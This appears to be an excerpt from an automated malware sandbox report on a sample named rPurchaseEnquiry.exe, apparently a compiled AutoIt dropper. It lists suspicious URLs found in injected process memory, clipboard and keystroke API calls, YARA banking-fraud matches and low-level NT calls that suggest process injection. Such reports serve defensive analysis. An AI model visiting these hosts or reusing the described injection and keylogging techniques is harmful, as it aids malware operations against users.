                Source: rasdial.exe, 00000005.00000002.3649099627.00000000061AC000.00000004.10000000.00040000.00000000.sdmp, rdDg0b2bK2qO9Yy1bQgDRyk.exe, 0000000C.00000002.3648330350.000000000312C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://rscpoo.ggtap.buzz/upload/29/835cbd5aace3c3b856c7631fa7c0e1.gif
                Source: rasdial.exe, 00000005.00000002.3649099627.00000000061AC000.00000004.10000000.00040000.00000000.sdmp, rdDg0b2bK2qO9Yy1bQgDRyk.exe, 0000000C.00000002.3648330350.000000000312C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://rscpoo.ggtap.buzz/upload/2c/11d68acd17391d5b5163ea77871e16.gif
                Source: rasdial.exe, 00000005.00000002.3649099627.00000000061AC000.00000004.10000000.00040000.00000000.sdmp, rdDg0b2bK2qO9Yy1bQgDRyk.exe, 0000000C.00000002.3648330350.000000000312C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://rscpoo.ggtap.buzz/upload/32/42da83ddb81b871e9fc0b60a82e6c0.gif
                Source: rasdial.exe, 00000005.00000002.3649099627.00000000061AC000.00000004.10000000.00040000.00000000.sdmp, rdDg0b2bK2qO9Yy1bQgDRyk.exe, 0000000C.00000002.3648330350.000000000312C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://rscpoo.ggtap.buzz/upload/3f/a269a595cb19b23411ab5cfff1e80a.gif
                Source: rasdial.exe, 00000005.00000002.3649099627.00000000061AC000.00000004.10000000.00040000.00000000.sdmp, rdDg0b2bK2qO9Yy1bQgDRyk.exe, 0000000C.00000002.3648330350.000000000312C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://rscpoo.ggtap.buzz/upload/85/2778e330d80e4117aa00ada2f8a287.gif
                Source: rasdial.exe, 00000005.00000002.3649099627.00000000061AC000.00000004.10000000.00040000.00000000.sdmp, rdDg0b2bK2qO9Yy1bQgDRyk.exe, 0000000C.00000002.3648330350.000000000312C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://rscpoo.ggtap.buzz/upload/89/700a785063c18cdc5c22f34e47f247.gif
                Source: rasdial.exe, 00000005.00000002.3649099627.00000000061AC000.00000004.10000000.00040000.00000000.sdmp, rdDg0b2bK2qO9Yy1bQgDRyk.exe, 0000000C.00000002.3648330350.000000000312C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://rscpoo.ggtap.buzz/upload/a0/1eaf6944a3575143d2c1879220b6c2.gif
                Source: rdDg0b2bK2qO9Yy1bQgDRyk.exe, 0000000C.00000002.3648330350.000000000312C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://rscpoo.ggtap.buzz/upload/aa/f2835736194fb0e7182f70a61e515a.gif
                Source: rasdial.exe, 00000005.00000002.3649099627.00000000061AC000.00000004.10000000.00040000.00000000.sdmp, rdDg0b2bK2qO9Yy1bQgDRyk.exe, 0000000C.00000002.3648330350.000000000312C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://rscpoo.ggtap.buzz/upload/b0/020fe9fa9dc45088976db5b55e3dfb.gif
                Source: rasdial.exe, 00000005.00000002.3649099627.00000000061AC000.00000004.10000000.00040000.00000000.sdmp, rdDg0b2bK2qO9Yy1bQgDRyk.exe, 0000000C.00000002.3648330350.000000000312C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://rscpoo.ggtap.buzz/upload/b1/0481057209773531fe70f5add20e2b.gif
                Source: rasdial.exe, 00000005.00000002.3649099627.00000000061AC000.00000004.10000000.00040000.00000000.sdmp, rdDg0b2bK2qO9Yy1bQgDRyk.exe, 0000000C.00000002.3648330350.000000000312C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://rscpoo.ggtap.buzz/upload/b7/fc595b2061daccb89a3352b4df57ac.gif
                Source: rasdial.exe, 00000005.00000002.3649099627.00000000061AC000.00000004.10000000.00040000.00000000.sdmp, rdDg0b2bK2qO9Yy1bQgDRyk.exe, 0000000C.00000002.3648330350.000000000312C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://rscpoo.ggtap.buzz/upload/c8/ce00295d0222f43e832c24c01c297b.gif
                Source: rasdial.exe, 00000005.00000002.3649099627.00000000061AC000.00000004.10000000.00040000.00000000.sdmp, rdDg0b2bK2qO9Yy1bQgDRyk.exe, 0000000C.00000002.3648330350.000000000312C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://rscpoo.ggtap.buzz/upload/da/e83f1b22c26ab59ca5e030a5990b26.gif
                Source: rasdial.exe, 00000005.00000002.3649099627.00000000061AC000.00000004.10000000.00040000.00000000.sdmp, rdDg0b2bK2qO9Yy1bQgDRyk.exe, 0000000C.00000002.3648330350.000000000312C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://rscpoo.ggtap.buzz/upload/e8/32cdeeb6dc2c8d923941154e189612.gif
                Source: rasdial.exe, 00000005.00000002.3650854963.0000000007E60000.00000004.00000800.00020000.00000000.sdmp, rasdial.exe, 00000005.00000002.3649099627.00000000061AC000.00000004.10000000.00040000.00000000.sdmp, rdDg0b2bK2qO9Yy1bQgDRyk.exe, 0000000C.00000002.3648330350.000000000312C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://rwc.lpdh7.autos/lpdh/go/
                Source: rasdial.exe, 00000005.00000002.3650854963.0000000007E60000.00000004.00000800.00020000.00000000.sdmp, rasdial.exe, 00000005.00000002.3649099627.00000000061AC000.00000004.10000000.00040000.00000000.sdmp, rdDg0b2bK2qO9Yy1bQgDRyk.exe, 0000000C.00000002.3648330350.000000000312C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://ryo.yydh9.boats/yydh/want/
                Source: rasdial.exe, 00000005.00000002.3650854963.0000000007E60000.00000004.00000800.00020000.00000000.sdmp, rasdial.exe, 00000005.00000002.3649099627.00000000061AC000.00000004.10000000.00040000.00000000.sdmp, rdDg0b2bK2qO9Yy1bQgDRyk.exe, 0000000C.00000002.3648330350.000000000312C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://sbzytpimg1.com:3519/upload/vod/20250315-1/12b66cd391c560d46f2678e3d5bddeef.jpg
                Source: rasdial.exe, 00000005.00000002.3650854963.0000000007E60000.00000004.00000800.00020000.00000000.sdmp, rasdial.exe, 00000005.00000002.3649099627.00000000061AC000.00000004.10000000.00040000.00000000.sdmp, rdDg0b2bK2qO9Yy1bQgDRyk.exe, 0000000C.00000002.3648330350.000000000312C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://sbzytpimg1.com:3519/upload/vod/20250317-1/2c17eb1a41058870975147f27f5205ec.jpg
                Source: rasdial.exe, 00000005.00000002.3650854963.0000000007E60000.00000004.00000800.00020000.00000000.sdmp, rasdial.exe, 00000005.00000002.3649099627.00000000061AC000.00000004.10000000.00040000.00000000.sdmp, rdDg0b2bK2qO9Yy1bQgDRyk.exe, 0000000C.00000002.3648330350.000000000312C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://scj.qzjp7.work/cn/home/web/
                Source: rasdial.exe, 00000005.00000002.3650854963.0000000007E60000.00000004.00000800.00020000.00000000.sdmp, rasdial.exe, 00000005.00000002.3649099627.00000000061AC000.00000004.10000000.00040000.00000000.sdmp, rdDg0b2bK2qO9Yy1bQgDRyk.exe, 0000000C.00000002.3648330350.000000000312C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://suy.ywn7.online/cn/home/web/
                Source: rasdial.exe, 00000005.00000002.3650854963.0000000007E60000.00000004.00000800.00020000.00000000.sdmp, rasdial.exe, 00000005.00000002.3649099627.00000000061AC000.00000004.10000000.00040000.00000000.sdmp, rdDg0b2bK2qO9Yy1bQgDRyk.exe, 0000000C.00000002.3648330350.000000000312C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://sxx.pzgcq4.quest/cn/home/web/
                Source: rasdial.exe, 00000005.00000002.3650854963.0000000007E60000.00000004.00000800.00020000.00000000.sdmp, rasdial.exe, 00000005.00000002.3649099627.00000000061AC000.00000004.10000000.00040000.00000000.sdmp, rdDg0b2bK2qO9Yy1bQgDRyk.exe, 0000000C.00000002.3648330350.000000000312C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://thjpg3.top/upload/vod/20250317-1/a15cc21360f5aa1555cefceeba87ec08.jpg
                Source: rasdial.exe, 00000005.00000002.3650854963.0000000007E60000.00000004.00000800.00020000.00000000.sdmp, rasdial.exe, 00000005.00000002.3649099627.00000000061AC000.00000004.10000000.00040000.00000000.sdmp, rdDg0b2bK2qO9Yy1bQgDRyk.exe, 0000000C.00000002.3648330350.000000000312C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://tir.yhdh4.shop/yhdh/there/
                Source: rasdial.exe, 00000005.00000002.3650854963.0000000007E60000.00000004.00000800.00020000.00000000.sdmp, rasdial.exe, 00000005.00000002.3649099627.00000000061AC000.00000004.10000000.00040000.00000000.sdmp, rdDg0b2bK2qO9Yy1bQgDRyk.exe, 0000000C.00000002.3648330350.000000000312C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://tte.xqzy4.world/cn/home/web/
                Source: rasdial.exe, 00000005.00000002.3650854963.0000000007E60000.00000004.00000800.00020000.00000000.sdmp, rasdial.exe, 00000005.00000002.3649099627.00000000061AC000.00000004.10000000.00040000.00000000.sdmp, rdDg0b2bK2qO9Yy1bQgDRyk.exe, 0000000C.00000002.3648330350.000000000312C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://ucq.bssp5.blog/bssp/
                Source: rasdial.exe, 00000005.00000002.3650854963.0000000007E60000.00000004.00000800.00020000.00000000.sdmp, rasdial.exe, 00000005.00000002.3649099627.00000000061AC000.00000004.10000000.00040000.00000000.sdmp, rdDg0b2bK2qO9Yy1bQgDRyk.exe, 0000000C.00000002.3648330350.000000000312C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://udg.wmlp7.website/cn/home/web/
                Source: rasdial.exe, 00000005.00000002.3650854963.0000000007E60000.00000004.00000800.00020000.00000000.sdmp, rasdial.exe, 00000005.00000002.3649099627.00000000061AC000.00000004.10000000.00040000.00000000.sdmp, rdDg0b2bK2qO9Yy1bQgDRyk.exe, 0000000C.00000002.3648330350.000000000312C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://umv.lgcq4.one/cn/home/web/
                Source: rasdial.exe, 00000005.00000002.3650854963.0000000007E60000.00000004.00000800.00020000.00000000.sdmp, rasdial.exe, 00000005.00000002.3649099627.00000000061AC000.00000004.10000000.00040000.00000000.sdmp, rdDg0b2bK2qO9Yy1bQgDRyk.exe, 0000000C.00000002.3648330350.000000000312C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://vkk.tzdh9.ink/tzdh/how/
                Source: rasdial.exe, 00000005.00000002.3650854963.0000000007E60000.00000004.00000800.00020000.00000000.sdmp, rasdial.exe, 00000005.00000002.3649099627.00000000061AC000.00000004.10000000.00040000.00000000.sdmp, rdDg0b2bK2qO9Yy1bQgDRyk.exe, 0000000C.00000002.3648330350.000000000312C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://wfj.bjxc3.buzz/cn/home/web/
                Source: rasdial.exe, 00000005.00000002.3650854963.0000000007E60000.00000004.00000800.00020000.00000000.sdmp, rasdial.exe, 00000005.00000002.3649099627.00000000061AC000.00000004.10000000.00040000.00000000.sdmp, rdDg0b2bK2qO9Yy1bQgDRyk.exe, 0000000C.00000002.3648330350.000000000312C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://wqa.ylgj9.rest/cn/home/web/
                Source: rasdial.exe, 00000005.00000002.3650854963.0000000007E60000.00000004.00000800.00020000.00000000.sdmp, rasdial.exe, 00000005.00000002.3649099627.00000000061AC000.00000004.10000000.00040000.00000000.sdmp, rdDg0b2bK2qO9Yy1bQgDRyk.exe, 0000000C.00000002.3648330350.000000000312C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.avdazhan.com/
                Source: rasdial.exe, 00000005.00000002.3650854963.0000000007E60000.00000004.00000800.00020000.00000000.sdmp, rasdial.exe, 00000005.00000002.3649099627.00000000061AC000.00000004.10000000.00040000.00000000.sdmp, rdDg0b2bK2qO9Yy1bQgDRyk.exe, 0000000C.00000002.3648330350.000000000312C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.avnyg.com/
                Source: rasdial.exe, 00000005.00000002.3650854963.0000000007E60000.00000004.00000800.00020000.00000000.sdmp, rasdial.exe, 00000005.00000002.3649099627.00000000061AC000.00000004.10000000.00040000.00000000.sdmp, rdDg0b2bK2qO9Yy1bQgDRyk.exe, 0000000C.00000002.3648330350.000000000312C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.dongche1.com/
                Source: rasdial.exe, 00000005.00000003.1490027884.000000000810D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20
                Source: rasdial.exe, 00000005.00000003.1490027884.000000000810D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
                Source: rasdial.exe, 00000005.00000002.3650854963.0000000007E60000.00000004.00000800.00020000.00000000.sdmp, rasdial.exe, 00000005.00000002.3649099627.00000000061AC000.00000004.10000000.00040000.00000000.sdmp, rdDg0b2bK2qO9Yy1bQgDRyk.exe, 0000000C.00000002.3648330350.000000000312C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.lkhsp.com/
                Source: rasdial.exe, 00000005.00000002.3650854963.0000000007E60000.00000004.00000800.00020000.00000000.sdmp, rasdial.exe, 00000005.00000002.3649099627.00000000061AC000.00000004.10000000.00040000.00000000.sdmp, rdDg0b2bK2qO9Yy1bQgDRyk.exe, 0000000C.00000002.3648330350.000000000312C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.nzxsp.com/
                Source: rasdial.exe, 00000005.00000002.3650854963.0000000007E60000.00000004.00000800.00020000.00000000.sdmp, rasdial.exe, 00000005.00000002.3649099627.00000000061AC000.00000004.10000000.00040000.00000000.sdmp, rdDg0b2bK2qO9Yy1bQgDRyk.exe, 0000000C.00000002.3648330350.000000000312C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.qqqabc.com/
                Source: rasdial.exe, 00000005.00000002.3650854963.0000000007E60000.00000004.00000800.00020000.00000000.sdmp, rasdial.exe, 00000005.00000002.3649099627.00000000061AC000.00000004.10000000.00040000.00000000.sdmp, rdDg0b2bK2qO9Yy1bQgDRyk.exe, 0000000C.00000002.3648330350.000000000312C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.slszx.com/
                Source: rasdial.exe, 00000005.00000002.3649099627.00000000061AC000.00000004.10000000.00040000.00000000.sdmp, rdDg0b2bK2qO9Yy1bQgDRyk.exe, 0000000C.00000002.3648330350.000000000312C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.xzylm.com
                Source: rasdial.exe, 00000005.00000002.3650854963.0000000007E60000.00000004.00000800.00020000.00000000.sdmp, rasdial.exe, 00000005.00000002.3649099627.00000000061AC000.00000004.10000000.00040000.00000000.sdmp, rdDg0b2bK2qO9Yy1bQgDRyk.exe, 0000000C.00000002.3648330350.000000000312C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.yhdd9.com/
                Source: rasdial.exe, 00000005.00000002.3650854963.0000000007E60000.00000004.00000800.00020000.00000000.sdmp, rasdial.exe, 00000005.00000002.3649099627.00000000061AC000.00000004.10000000.00040000.00000000.sdmp, rdDg0b2bK2qO9Yy1bQgDRyk.exe, 0000000C.00000002.3648330350.000000000312C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://wzr.ldfl5.shop/cn/home/web/
                Source: rasdial.exe, 00000005.00000002.3650854963.0000000007E60000.00000004.00000800.00020000.00000000.sdmp, rasdial.exe, 00000005.00000002.3649099627.00000000061AC000.00000004.10000000.00040000.00000000.sdmp, rdDg0b2bK2qO9Yy1bQgDRyk.exe, 0000000C.00000002.3648330350.000000000312C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://xfk.qxll7.beauty/cn/home/web/
                Source: rasdial.exe, 00000005.00000002.3649099627.00000000061AC000.00000004.10000000.00040000.00000000.sdmp, rdDg0b2bK2qO9Yy1bQgDRyk.exe, 0000000C.00000002.3648330350.000000000312C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://xklsammindejkdlsa.sjkglea14392.mom/lm/new.html?channelCode=mlm584
                Source: rasdial.exe, 00000005.00000002.3650854963.0000000007E60000.00000004.00000800.00020000.00000000.sdmp, rasdial.exe, 00000005.00000002.3649099627.00000000061AC000.00000004.10000000.00040000.00000000.sdmp, rdDg0b2bK2qO9Yy1bQgDRyk.exe, 0000000C.00000002.3648330350.000000000312C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://xlx.bwxs8.quest/cn/home/web/
                Source: rasdial.exe, 00000005.00000002.3650854963.0000000007E60000.00000004.00000800.00020000.00000000.sdmp, rasdial.exe, 00000005.00000002.3649099627.00000000061AC000.00000004.10000000.00040000.00000000.sdmp, rdDg0b2bK2qO9Yy1bQgDRyk.exe, 0000000C.00000002.3648330350.000000000312C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://xnw.pbw4.beauty/pbw/
                Source: rasdial.exe, 00000005.00000002.3650854963.0000000007E60000.00000004.00000800.00020000.00000000.sdmp, rasdial.exe, 00000005.00000002.3649099627.00000000061AC000.00000004.10000000.00040000.00000000.sdmp, rdDg0b2bK2qO9Yy1bQgDRyk.exe, 0000000C.00000002.3648330350.000000000312C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://yfl.gcjx7.beauty/cn/home/web/
                Source: rasdial.exe, 00000005.00000002.3650854963.0000000007E60000.00000004.00000800.00020000.00000000.sdmp, rasdial.exe, 00000005.00000002.3649099627.00000000061AC000.00000004.10000000.00040000.00000000.sdmp, rdDg0b2bK2qO9Yy1bQgDRyk.exe, 0000000C.00000002.3648330350.000000000312C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://yxv.mmzy2.rest/cn/home/web/
                Source: rasdial.exe, 00000005.00000002.3649099627.00000000061AC000.00000004.10000000.00040000.00000000.sdmp, rdDg0b2bK2qO9Yy1bQgDRyk.exe, 0000000C.00000002.3648330350.000000000312C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://yyy685.top
                Source: rasdial.exe, 00000005.00000002.3650854963.0000000007E60000.00000004.00000800.00020000.00000000.sdmp, rasdial.exe, 00000005.00000002.3649099627.00000000061AC000.00000004.10000000.00040000.00000000.sdmp, rdDg0b2bK2qO9Yy1bQgDRyk.exe, 0000000C.00000002.3648330350.000000000312C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://zbw.avdw8.boats/cn/home/web/
                Source: rasdial.exe, 00000005.00000002.3650854963.0000000007E60000.00000004.00000800.00020000.00000000.sdmp, rasdial.exe, 00000005.00000002.3649099627.00000000061AC000.00000004.10000000.00040000.00000000.sdmp, rdDg0b2bK2qO9Yy1bQgDRyk.exe, 0000000C.00000002.3648330350.000000000312C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://zfq.yjss3.lol/cn/home/web/
                Source: rasdial.exe, 00000005.00000002.3650854963.0000000007E60000.00000004.00000800.00020000.00000000.sdmp, rasdial.exe, 00000005.00000002.3649099627.00000000061AC000.00000004.10000000.00040000.00000000.sdmp, rdDg0b2bK2qO9Yy1bQgDRyk.exe, 0000000C.00000002.3648330350.000000000312C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://zjj.hllt6.fit/cn/home/web/
                Source: rasdial.exe, 00000005.00000002.3650854963.0000000007E60000.00000004.00000800.00020000.00000000.sdmp, rasdial.exe, 00000005.00000002.3649099627.00000000061AC000.00000004.10000000.00040000.00000000.sdmp, rdDg0b2bK2qO9Yy1bQgDRyk.exe, 0000000C.00000002.3648330350.000000000312C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://zxb.sssq9.wiki/cn/home/web/
                Source: rasdial.exe, 00000005.00000002.3650854963.0000000007E60000.00000004.00000800.00020000.00000000.sdmp, rasdial.exe, 00000005.00000002.3649099627.00000000061AC000.00000004.10000000.00040000.00000000.sdmp, rdDg0b2bK2qO9Yy1bQgDRyk.exe, 0000000C.00000002.3648330350.000000000312C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://zyzf2dimage.ck3ksmw.com/uploads/images/movies/2025-03-17/1742168600111.png
                Source: rasdial.exe, 00000005.00000002.3650854963.0000000007E60000.00000004.00000800.00020000.00000000.sdmp, rasdial.exe, 00000005.00000002.3649099627.00000000061AC000.00000004.10000000.00040000.00000000.sdmp, rdDg0b2bK2qO9Yy1bQgDRyk.exe, 0000000C.00000002.3648330350.000000000312C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://zyzhyimage.zxbue74.com/uploads/images/movies/2025-03-17/1742166532567.jpeg
                Source: rasdial.exe, 00000005.00000002.3650854963.0000000007E60000.00000004.00000800.00020000.00000000.sdmp, rasdial.exe, 00000005.00000002.3649099627.00000000061AC000.00000004.10000000.00040000.00000000.sdmp, rdDg0b2bK2qO9Yy1bQgDRyk.exe, 0000000C.00000002.3648330350.000000000312C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://zyzjcimage.4cnvhry.com/uploads/images/movies/2025-03-17/1742195563205.jpeg
                Source: rasdial.exe, 00000005.00000002.3650854963.0000000007E60000.00000004.00000800.00020000.00000000.sdmp, rasdial.exe, 00000005.00000002.3649099627.00000000061AC000.00000004.10000000.00040000.00000000.sdmp, rdDg0b2bK2qO9Yy1bQgDRyk.exe, 0000000C.00000002.3648330350.000000000312C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://zyzllimage.7mfs86q.com/uploads/images/movies/2025-03-15/1742036569781.jpeg
                Source: rasdial.exe, 00000005.00000002.3650854963.0000000007E60000.00000004.00000800.00020000.00000000.sdmp, rasdial.exe, 00000005.00000002.3649099627.00000000061AC000.00000004.10000000.00040000.00000000.sdmp, rdDg0b2bK2qO9Yy1bQgDRyk.exe, 0000000C.00000002.3648330350.000000000312C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://zyzlsnimage.xj2um6z.com/uploads/images/movies/2025-03-17/1742179743617.jpeg
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeCode function: 0_2_00C04164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00C04164
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeCode function: 0_2_00C04164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00C04164
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeCode function: 0_2_00C03F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00C03F66
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeCode function: 0_2_00BF001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00BF001C
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeCode function: 0_2_00C1CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00C1CABC

                E-Banking Fraud

                barindex
                Source: Yara matchFile source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.3648063161.0000000003560000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3646181884.0000000002FA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1308769709.00000000036D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1308257094.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3648116990.00000000035B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3648050899.0000000004050000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1309204270.0000000005200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeCode function: This is a third-party compiled AutoIt script.0_2_00B93B3A
                Source: rPurchaseEnquiry.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: rPurchaseEnquiry.exe, 00000000.00000000.1191894037.0000000000C44000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_9be49dce-d
                Source: rPurchaseEnquiry.exe, 00000000.00000000.1191894037.0000000000C44000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_60ae0fe4-7
                Source: rPurchaseEnquiry.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_ec253d2a-4
                Source: rPurchaseEnquiry.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_8f00043c-e
                Source: initial sampleStatic PE information: Filename: rPurchaseEnquiry.exe
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0042C873 NtClose,3_2_0042C873
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872B60 NtClose,LdrInitializeThunk,3_2_03872B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_03872DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_03872C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038735C0 NtCreateMutant,LdrInitializeThunk,3_2_038735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03874340 NtSetContextThread,3_2_03874340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03874650 NtSuspendThread,3_2_03874650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872B80 NtQueryInformationFile,3_2_03872B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872BA0 NtEnumerateValueKey,3_2_03872BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872BE0 NtQueryValueKey,3_2_03872BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872BF0 NtAllocateVirtualMemory,3_2_03872BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872AB0 NtWaitForSingleObject,3_2_03872AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872AD0 NtReadFile,3_2_03872AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872AF0 NtWriteFile,3_2_03872AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872F90 NtProtectVirtualMemory,3_2_03872F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872FA0 NtQuerySection,3_2_03872FA0
